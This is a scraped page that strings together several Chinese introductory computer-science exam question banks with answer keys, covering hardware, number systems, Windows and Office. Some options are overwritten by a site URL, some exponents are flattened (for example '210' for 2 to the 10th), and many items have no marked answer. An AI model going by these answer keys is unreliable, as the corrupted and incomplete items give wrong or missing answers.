一、单选题练习 1.完整的计算机系统由( C )组成。 A.运算器、控制器、存储器、输入设备和输出设备 B.主机和外部设备 C.硬件系统和软件系统 D.主机箱、显示器、键盘、鼠标、打印机 2.以下软件中,( D )不是操作系统软件。 A.Windows xp B.unix C.linux D.microsoft office 3.用一个字节最多能编出( D )不同的码。 A. 8 个 B. 16个 C. 128 个 D. 256个 4.任何程序都必须加载到( C )中才能被CPU执行。 A. 磁盘 B. 硬盘 C. 内存 D. 外存 5.下列设备中,属于输出设备的是( A )。 A.显示器 B.键盘 C.鼠标 D.手字板 6.计算机信息计量单位中的K代表( B )。 A. 102 B. 210 C. 103 D. 28 7.RAM代表的是( C )。 A. 只读存储器 B. 高速缓存器 C. 随机存储器 D. 软盘存储器 8.组成计算机的CPU的两大部件是( A )。 A.运算器和控制器 B. 控制器和寄存器 C.运算器和内存 D. 控制器和内存 9.在描述信息传输中bps表示的是( D )。 A. 每秒传输的字节数 B.每秒传输的指令数 C.每秒传输的字数 D.每秒传输的位数 10.微型计算机的内存容量主要指( A )的容量。 A. RAM B. ROM C. CMOS D. Cache 11.十进制数27对应的二进制数为( D )。

A.1011 B. 1100 C. 10111 D. 11011 12.Windows的目录结构采用的是( A )。 A.树形结构 B.线形结构 C.层次结构 D.网状结构 13.将回收站中的文件还原时,被还原的文件将回到( D )。 A.桌面上 B.“我的文档”中 C.内存中 D.被删除的位置 14.在Windows 的窗口菜单中,若某命令项后面有向右的黑三角,则表示该命令项( A )。 A. 有下级子菜单 B.单击鼠标可直接执行 C.双击鼠标可直接执行 D.右击鼠标可直接执 15.计算机的三类总线中,不包括( C )。 A. 控制总线 B.地址总线 C.传输总线 D.数据总线 16.操作系统按其功能关系分为系统层、管理层和( D )三个层次。 A. 数据层 B.逻辑层 C.用户层 D.应用层 17.汉字的拼音输入码属于汉字的( A )。 A. 外码 B. 内码 C.ASCII 码 D.标准码 18.Windows的剪贴板是用于临时存放信息的( C )。 A.一个窗口 B.一个文件夹 C.一块内存区间 D.一块磁盘区间 19.对处于还原状态的Windows应用程序窗口,不能实现的操作是( D )。 A.最小化 B.最大化 C.移动 D.旋转 20.在计算机上插U盘的接口通常是( D )标准接口。 A.UPS https://www.doczj.com/doc/c22015421.html,P C.UBS https://www.doczj.com/doc/c22015421.html,B 21.新建文档时,Word默认的字体和字号分别是( C )。 A.黑体、3 号 B.楷体、4号 C.宋体、5 号 D.仿宋、6号 22.第一次保存Word文档时,系统将打开( B )对话框。 A. 保存 B.另存为 C.新建 D.关闭 23.在Word表格中,位于第三行第四列的单元格名称是

计算机导论期末考试试题及答案

计算机专业计算机导论期末试题 一、单选题(每小题1分,共80分) 1.客机、火车订票系统属于 C 。 A.科学计算方面的计算机应用 B.数据处理方面的计算机应用 C.过程控制方面的计算机应用 D.人工智能方面的计算机应用 2.按照计算机用途分类,可将计算机分为 D 。 A.通用计算机、个人计算机 B.数字计算机、模拟计算机 C.数字计算机、混合计算机 D.通用计算机、专用计算机 3.下列数中最大的数是。 A.(1000101)2 B.(107)8 C.(73)10 D.(4B)16 4.已知:3×4=10,则5×6= D 。 A.24 B.26 C.30 D.36 5.假设某计算机的字长为8位,则十进制数(+67)10的反码表示为。 A.01000011 B.00111100 C.00111101 D.10111100 6.假设某计算机的字长为8位,则十进制数(-75)10的补码表示为。 A.01001011 B.11001011 C.10110100 D.10110101 7.已知:“B”的ASCII码值是66,则码值为1000100的字符为。 A.“C” B.“D” C.“E” D.“F” 8.在计算机系统内部,汉字的表示方法是采用。 A.ASCII码 B.机内码 C.国标码 D.区位码 9.汉字“办”的区位码是1676,其国标码是。 A.1676H B.4908H C.306CH D.3108H 10.一个汉字字形采用点阵时,其字形码要占72B。 A.16×16 B.24×24 C.32×32 D.48×48 11.在逻辑运算中有Y=A+B,则表示逻辑变量A和B进行 B 。 A.与运算 B.或运算 C.非运算 D.与非运算 12.通常所说的CPU包括 C 。 A.运算器 B.控制器 C.运算器和控制器 D.运算器、控制器和内存 13.计算机的内存储器比外存储器 B 。 A.更便宜 B.存储速度快 C.存储容量大 D.虽贵但能存储更多信息 14.外部设备是指。 A.输入设备和输出设备 B.输入设备、输出设备、主存储器

计算机基础试题库[含答案解析]

计算机基础题库 一单选题 计算机基础知识 1.目前使用的“奔腾”型微机采用的逻辑器件属于() A. 电子管 B. 晶体管 C. 集成电路 D. 超大规模集成电路 2.第4代电子计算机使用的电子元件是() A.电子管 B.晶体管 C.中小规模集成电路 D.大规模和超大规模集成电路 3.在计算机存储器的术语中,一个“Byte”包含8个() A. 字母 B. 字长 C. 字节 D. 比特 4.目前微型计算机中的高速缓存(Cache),大多数是一种() A. 静态只读存储器 B. 静态随机存储器 C. 动态只读存储器 D. 动态随机存储器 5.目前微机配置的光盘驱动器大多数是DVD,与之对应的光盘存储容量可以达到() A. 650~700MB B. 1~2GB C. 4~5GB D. 6~9GB 6.组成微型计算机“主机”的两个主要部件是微处理器和() A. 硬盘 B. 软盘 C. 光盘 D. 内存储器 7.计算机辅助设计的英文缩写是() A. CAM B. CAI C. CAD D. CAT 8.将微型计算机的发展阶段分为第一代微型机,第二代微型机,…,是根据下列哪个设备或器件决定的() A. 输入输出设备 B. 微处理器 C. 存储器 D. 运算器

9.我国研制出先进的中国象棋软件,利用该软件,计算机可以与中国象棋大师进行比赛,这属于下列计算机应用领域中的() A. 人工智能 B. 科学计算 C. 数据处理 D. 计算机辅助设计 10.计算机一次存取、加工和传送的二进制数据的单位称为() A. bit B. byte C. word D. KB 11.计算机基本外设的工作是靠一组驱动程序来完成的,这组程序代码保存在主机板的特殊的内存芯片中,称这组芯片为() A. Cache B. ROM C. I/O D. BIOS 12.电子计算机能够按照人们的意图自动地进行工作,是因为采用了() A. 逻辑运算部件 B. 自动识别控制方式 C. 程序存储方式 D. 多总线结构方式 13.在微机中,下列设备属于输入设备的是() A. 打印机 B. 显示器 C. 绘图仪 D. 键盘 14.在计算机中,运算器是用来进行() A. 加减法运算的部件 B. 算术和逻辑运算的部件 C. 加减乘除法运算的部件 D. 乘除法运算的部件 15.在计算机中,用来传送、存储、加工处理的信息表示形式是() A. 拼音简码 B. ASCII码 C. 二进制码 D. 十六进制码 16.硬盘分区的目的之一是() A. 对硬盘进行格式化 B. 便于安装操作系统 C. 便于清除硬盘上的数据和程序 D. 清除硬盘上的所有病毒 17.世界上第一台电子计算机诞生于() A. 美国

大学计算机基础习题及答案

第一单元 1.一般认为,信息(information)就是(C) A.数据 B.人们关心的事情的消息 C.反应物质及其运动属性与特征的原始事实 D.记录下来的可鉴别符号 2.信息资源的开发与利用已经成为独立的产业,即(C) A.第二产业 B.第三产业 C.信息产业 D.房地产业 3.信息技术就是信息处理中所采取的技术与方法,也可以瞧作就是(B)的一种技术。A.信息存储功能 B.扩展人感觉与记忆功能 C.信息采集功能 D.信息传递功能 4.所谓3C技术就是指(C) A.新材料与新能量 B.电子技术、微电子技术、激光技术 C.计算机技术、通信技术、控制技术 D.信息技术在人类生产与生活中得各种具体应用 5.目前应用愈来愈广泛的优盘(U盘)属于(B)技术。 A.刻录 B.移动存储 C.网络存储 D.直接连接存储 6.信息安全的四大隐患就是:计算机犯罪、计算机病毒、(C)与计算机设备的物理性破坏。A.自然灾害 B.网络盗窃 C.误操作 D.软件盗版 7、“蠕虫”往往就是通过(C)进入其她计算机系统。 A.网关 B.系统 C.网络 D、防火墙 8、在如下四种病毒中,计算机一开始启动操作系统就可能起破坏作用的就是(D) A.良性病毒 B.文件型病毒 C.宏病毒 D.系统引导型 9、计算机要执行一条指令,CPU首先所涉及的操作应该就是(B) A.指令密码 B.取指令

D.读写磁盘 10、计算机中能直接被CPU存取的信息就是存放在(D)中。 A.软盘 B.硬盘 C.高速缓存 D.内存 11、计算机断电或者重新启动后,(A)中的信息将丢失。 A.RAM B.ROM C.优盘 D.已存放在硬盘 12、计算机系统的内部总线,主要可分为(B)、数据总线与地址总线。 A.DMA总线 B.控制总线 C.PCI总线 D.RS-232总线 13、数据通信的系统模型由(B)三部分组成。 A.数据、通讯设备与计算机 B.数据源、数据通信网与数据宿 C.发送设备、同轴电缆与接收设备 D.计算机、连接电缆与网络设备 14、下面有关数制的说法中,不正确的就是(D)。 A.二进制数制仅含数符0与1 B.十进制16等于十六进制10H C.一个数字串的某数符可能为0,但任一数位上得“权”值不可能就是0 D.常用计算机内部一切数据都就是以十进制为运算单位的 15、高级语言可分为面向过程与面向对象亮大类,(A)属于面向过程的高级语言。 A.FORTRAN B.C++ C.JA V A D.SQL 16、计算机常用的数据通信接口中,传输速率最高的就是(D)。 https://www.doczj.com/doc/c22015421.html,B1、0 https://www.doczj.com/doc/c22015421.html,B2、0 C.RS232 D.IEEE1394 17、二进制数10001001011B转换为十进制数就是(C)。 A.2090 B.1077 C.1099 D.2077 18、十六进制数ABCDEH转换为十进制(B)。 A.713710

《大学计算机基础》试题题库及答案

《大学计算机基础》试题题库及答案 一、单选题练习 1.完整的计算机系统由( C )组成。 A.运算器、控制器、存储器、输入设备和输出设备 B.主机和外部设备 C.硬件系统和软件系统 D.主机箱、显示器、键盘、鼠标、打印机 2.以下软件中,( D )不是操作系统软件。 A.Windows xp B.unix C.linux D.m icrosoft office 3.用一个字节最多能编出( D )不同的码。 A. 8个 B. 16个 C. 128 个 D. 256个 4.任何程序都必须加载到( C )中才能被CPU执行。 A. 磁盘 B. 硬盘 C. 内存 D. 外存 5.下列设备中,属于输出设备的是( A )。 A.显示器 B.键盘 C.鼠标 D.手字板 6.计算机信息计量单位中的K代表( B )。 A. 102 B. 21 0 C. 103 D. 28 7.RAM代表的是( C )。 A. 只读存储器 B. 高速缓存器 C. 随机存储 器 D. 软盘存储器 8.组成计算机的CPU的两大部件是( A )。 A.运算器和控制器 B. 控制器和寄存器 C.运算器和内存 D. 控制器和内存 9.在描述信息传输中bps表示的是( D )。 A.每秒传输的字节数 B.每秒传输的指令数C.每秒传输的字数 D.每秒传输的位数10.微型计算机的内存容量主要指( A )的容量。 A. RAM B. ROM C. CMO S D. Cache 11.十进制数27对应的二进制数为( D )。 A.1011 B. 1100 C. 1011 1 D. 11011 12.Windows的目录结构采用的是( A )。 A.树形结构B.线形结构 C.层次结构 D.网状结构13.将回收站中的文件还原时,被还原的文件将回到( D )。 A.桌面上 B.“我的文档”中 C.内存中 D.被删除的位置14.在Windows 的窗口菜单中,若某命令项后面有向右的黑三角,则表示该命令项( A )。

(精选)《计算机导论》期末考试试题_模拟试题及答案

《计算机导论》期末考试试题模拟试题及 答案 一、填空题(每小题1分,共20分): 1. 计算机领域中采用_____二进制____、___8______、或____16_____来表示数值。。 2. 冯·诺依曼型计算机的两大特征是“程序存储”和“_采用二进制_____”。 3. 美国标准信息交换代码,简称ASCII码,它是__7__位二进制编码,因此,它可以表示_128___种字符。 4. 计算机中采用的基本逻辑电路主意有各种______门电路及触发器______。 5. 用___机器______语言编写的程序可由计算机直接执行。 6. 串口按信息传送格式可分为___串行接口并行接口_____。 7. 计算机的主存储器存储直接与_CPU_交换的信息,辅助存储器存放当前不立即使用的信息。 8. 堆栈是指用作数据暂存的一组寄存器或一片存储区,它的工作方式称为______。 9. 由寻址方式形成的操作数的真正存放地址,称为操作数的__有效地址____。 10. 计算机网络按距离可分为_局域网广域网____。 11. 设备管理中的设备是指计算机系统的___输入设备输出设备外存储器__。 12. 操作系统按功能特征可分为__批处理系统分时系统实时系统 _。 13. 高级语言的基本元素可以分为__数逻辑值名字标号字符串____等五大类。 14. 从根算起,树可以分为多个层次,树的__最大层次___称为树的深度。 15. ___数据结构__是数据组织形式,反映数据之间的关系,但不涉及数据的具体内容。

16. 线性表的链式存储结构中,每个元素需存储两部分信息:一部分是元素本身的信息,称之“_____”;另一部分则是该元素的直接后继元素的存储位置,称之“_____”。

大学计算机基础答试题及答案

大学计算机基础试题及答案 一、判断题(每题2分,共20分) 1、信息按状态划分可以划分为动态信息和静态信息。() 2、操作系统不具有通用性。() 3、在 Windows XP环境中,整个显示屏幕称为桌面。() 4、在 WindowsXP中,拖动鼠标执行复制操作时,鼠标指针的右下方带有“+”号。() 5、Word 2000 文档文件的扩展名缺省为.dot 。() 6、Excel2000 的工作表最多有255 列。() 7、演示文稿中的每一张演示的单页称为幻灯片。() 8、IP 地址可以用 8 位二进制数来表示。() 9、DHTML是一种表格的缩写。() 10、软件 Winamp是一种媒体播放软件。 () 一、单选题(每题1分,共20分) 1、计算机网络代表着第()次信息革命。 A、3 B、4 C、5 D、6 2、()奠定了现代计算机的结构理论。 A、霍金 B、爱因斯坦 C 、牛顿D、冯·诺依曼 3、微型机中必不可少的输入/ 输出设备是() A、显示器和打印机 B、键盘和鼠标器 C、键盘和显示器 D、鼠标器和打印机 4、在 Windows XP中,在“图画”程序中保存的文件,系统默认的扩展名是()。 A、.TXT B、.BMP C 、 .TIF D、.DOS 5、“回收站”是()的一块区域。 A、内存 B、软盘 C、硬盘 D、CPU 6、在资源管理器窗口中一次选中多个不连续的文件时, 可以先单击第一个文 件 , 按住 ( )键,再用鼠标选取其余的文件。

A、 Ctrl B、ALT C、Shift D、Tab 7、新建文档的快捷键是() A、Alt+N B、Ctrl+N C、Shiht+N D、 Ctrl+S 8、对于新创建的文档,执行“保存”命令时,显示()对话框。 A、另存为 B、打开 C、新建 D、页面设置 9、下列哪个选项不可以在“分栏”对话框中进行设置() A、栏数 B 、栏宽 C 、间距D、行距 10、Excel2000 的主要功能有电子表格制作功能、图表功能和()功能。 A、文字处理 B 、数据库管理 C 、数据透视图报表 D 、自动填充 11、下列操作中可以移动工作表的位置是() A、拖动工作表标签 B、单击工作表标签后,再单击目的位置 C、按 Ctrl拖动工作表标签 D、按 Shift键拖动工作表标签 12、在 Excel2000 中,单元格中()。 A、只能是数字 B、可以是数字、文字、公式等 C、只能是文字 D、以上都不是 13、PowerPoint 窗口的大纲窗格中,不可以()。 A、插入幻灯片 B 、删除幻灯片 C、移动幻灯片 D 、添加文本框 14、如要在演示文稿中添加一页幻灯片,应选择()。 A、新建文件按钮 B、复制按钮 C、新幻灯片按钮 D、打开按钮 15、计算机网络实现的资源共享包括:()、软件共享和硬件共享。 A、设备共享 B、程序共享 C、数据共享 D 、文件共享 16、IP 的中文含义是()。 A、信息协议 B 、内部协议 C 、传输控制协议 D 、网络互连协议 17、下列属于计算机局域网的是()。 A、校园网 B、国家网 C 、城市网D、因特网 18、作为网页内部跳转可用()。 A、超链接 B、书签 C、ftp软件 D、电子邮件 19、框架网页的属性包括()。

计算机基础试题题库及答案

计算机基础试题题库及答案 一、单选题练习 1.完整的计算机系统由( C )组成。 A.运算器、控制器、存储器、输入设备和输出设备 B.主机和外部设备 C.硬件系统和软件系统 D.主机箱、显示器、键盘、鼠标、打印机 2.以下软件中,( D )不是操作系统软件。 A.Windows xp B.unix C.linux D.microsoft office 3.用一个字节最多能编出( D )不同的码。 A. 8 个 B. 16个 C. 128 个 D. 256个 4.任何程序都必须加载到( C )中才能被CPU执行。 A. 磁盘 B. 硬盘 C. 内存 D. 外存 5.下列设备中,属于输出设备的是( A )。 A.显示器 B.键盘 C.鼠标 D.手字板 6.计算机信息计量单位中的K代表( B )。 A. 102 B. 210 C. 103 D. 28 7.RAM代表的是( C )。 A. 只读存储器 B. 高速缓存器 C. 随机存储器 D. 软盘存储器 8.组成计算机的CPU的两大部件是( A )。 A.运算器和控制器 B. 控制器和寄存器 C.运算器和内存 D. 控制器和内存 9.在描述信息传输中bps表示的是( D )。 A. 每秒传输的字节数 B.每秒传输的指令数 C.每秒传输的字数 D.每秒传输的位数

10.微型计算机的内存容量主要指( A )的容量。 A. RAM B. ROM C. CMOS D. Cache 11.十进制数27对应的二进制数为( D )。 A.1011 B. 1100 C. 10111 D. 11011 12.Windows的目录结构采用的是( A )。 A.树形结构 B.线形结构 C.层次结构 D.网状结构 13.将回收站中的文件还原时,被还原的文件将回到( D )。 A.桌面上 B.“我的文档”中 C.内存中 D.被删除的位置 14.在Windows 的窗口菜单中,若某命令项后面有向右的黑三角,则表示该命令项( A )。 A. 有下级子菜单 B.单击鼠标可直接执行 C.双击鼠标可直接执行 D.右击鼠标可直接执行 15.计算机的三类总线中,不包括( C )。 A. 控制总线 B.地址总线 C.传输总线 D.数据总线 16.操作系统按其功能关系分为系统层、管理层和( D )三个层次。 A. 数据层 B.逻辑层 C.用户层 D.应用层 17.汉字的拼音输入码属于汉字的( A )。 A. 外码 B. 内码 C.ASCII 码 D.标准码 18.Windows的剪贴板是用于临时存放信息的( C )。 A.一个窗口 B.一个文件夹 C.一块内存区间 D.一块磁盘区间 19.对处于还原状态的Windows应用程序窗口,不能实现的操作是( D )。 A.最小化 B.最大化 C.移动 D.旋转 20.在计算机上插U盘的接口通常是( D )标准接口。 A.UPS https://www.doczj.com/doc/c22015421.html,P C.UBS https://www.doczj.com/doc/c22015421.html,B 21.新建文档时,Word默认的字体和字号分别是( C )。 A.黑体、3 号 B.楷体、4号 C.宋体、5 号 D.仿宋、6号

8619计算机导论试题 答案

试卷代号:8619 安徽广播电视大学开放教育试点本科补修课程考试计算机科学与技术专业《计算机导论》答案及评分标准 (供参考) 一、填空题(每空1分,共20分) 1、1280×1024 2、后进先出 3、处理机管理存储器管理输入输出设备管理文件管理 4、条件格式 5、文件系统数据库系统 6、冗余压缩法(或无损压缩法/熵编码)熵压缩法(或有损压缩法) 7、实体安全网络安全应用安全管理安全 8、有线信道无线信道 9、及格 10、最低的耦合度,即不同的模块之间的关系尽可能弱模块的层次不能过深,一般应尽量控制在7层以内 二、单选题(每题2分,共20分) 1、C 2、 A 3、A 4、C 5、D 6、D 7、 D 8、A 9、C 10、 D 三、名词解释(每题5分,共20分) 1、RISC、CISC 答:精简指令集计算机(reduced instruction set computer) 复杂指令集计算机(complex instruction set computer) 2、分时操作系统:所谓分时是指多个用户终端共享使用一台计算机,即把计算机系统的CPU时间分割成一个个小的时间段(称其为一个时间片),从而将CPU的工作时间分别提供给各个用户终端。分时操作系统设计的主要目标是提高对用户响应的及时性。它

一般适用于带有多个终端的小型机。 3、SQL:SQL是Structured Query Language词组的缩写,含义为“结构化查询语言”,它包括数据的定义、操纵、查询和控制四个方面的功能,是一种功能齐全的数据库语言。 4、结构化方法:就是强调结构的合理性以及所开发的软件的结构的合理性。由此提出了一组提高软件结构合理性的准则。 四、问答题(每题10分,共40分) 1、答:1、数据传送类指令2、数据处理类指令3、程序控制类指令4、输入输出类指令5、硬件控制类指令 2、答案略。 3、答:图形一般指用计算机绘制的画面,如直线、圆、圆弧、任意曲线和图表等;图像则是指由输入设备捕捉的实际场景画面或以数字化形式存储的任意画面。 图像都是由一些排成行列的像素组成的,一般数据量都较大。而图形文件中只记录生成图的算法和图上的某些特征点,也称矢量图。相对于位图的大数据量来说,它占用的存储空间较小。 4、答:电子商务的系统框架构成:Internet:将计算机联网;域名服务器:用来进行域名地址和IP地址之间的转换;电子商务服务器:提供网上产品目录管理、网上电子交易安全监控、网上订货、电子收款机、银行支付网关等功能;电子商务应用服务器:提供供货链管理、网上市场、网上广告、网上零售、有偿服务、网上银行等功能;数据库服务器:提供对大量数据进行有效的存储、组织、管理、查询、检索等功能;支付网关:银行和金融系统和Internet的接口;认证机构:负责确认进行电子商务交易双方的身份、信誉度的权威性机构;电子商务客户机:顾客使用的终端机。

计算机基础知识试题及答案(全)..

《大学计算机》基础知识试题及答案 (说明:将认为正确答案的字母填写在每小题后面的括号内) 1.世界上第一台通用电子数字计算机诞生于( A )。 A.美国B.英国C.德国D.日本 2.世界上第一台通用电子数字计算机诞生于( B )。 A.1953年B.1946年C.1964年D.1956年 3.第一台电子计算机是1946年在美国研制的,该机的英文缩写名是(A )。 A.ENIAC B.EDVAC C.EDSAC D.MARK-II 4.一个完整的微型计算机系统应包括( C )。 A.计算机及外部设备 B.主机箱、键盘、显示器和打印机 C.硬件系统和软件系统 D.系统软件和系统硬件 5.计算机的中央处理器CPU包括运算器和( C )两部分。 A.存储器B.寄存器C.控制器D.译码器 6.下列设备中,( D )不是微型计算机的输出设备。 A.打印机B.显示器C.绘图仪D.扫描仪 7.下列各项中,不属于多媒体硬件的是(D )。 A.光盘驱动器 B.视频卡 C.音频卡 D.加密卡 8.计算机中对数据进行加工与处理的部件,通常称为( A )。 A.运算器 B.控制器 C.显示器 D.存储器 9.运算器的组成部分不包括( B )。 A.控制线路 B.译码器 C.加法器 D.寄存器 10.把内存中的数据传送到计算机的硬盘,称为( D )。 A.显示 B.读盘 C.输入 D.写盘 11.用MIPS为单位来衡量计算机的性能,它指的是计算机的( B ),指的是每秒处理的百 万级的机器语言指令数。 A.传输速率 B.运算速度 C.字长 D.存储器容量 12.计算机硬件的核心部件是( A )。 A.中央处理器B.存储器C.运算器D.控制器 13.在外部设备中,打印机属于计算机的( B )设备。 A.输入B.输出C.外存储D.内存储 14.CGA、EGA和VGA标志着( C )的不同规格和性能。 A.打印机 B.存储器 C.显示器 D.硬盘 15.硬盘上原存的有效信息,在下列哪种情况下会丢失( C )。 A.通过海关的X射线监视仪 B.放在盒内半年没有使用

相关主题
文本预览
相关文档 最新文档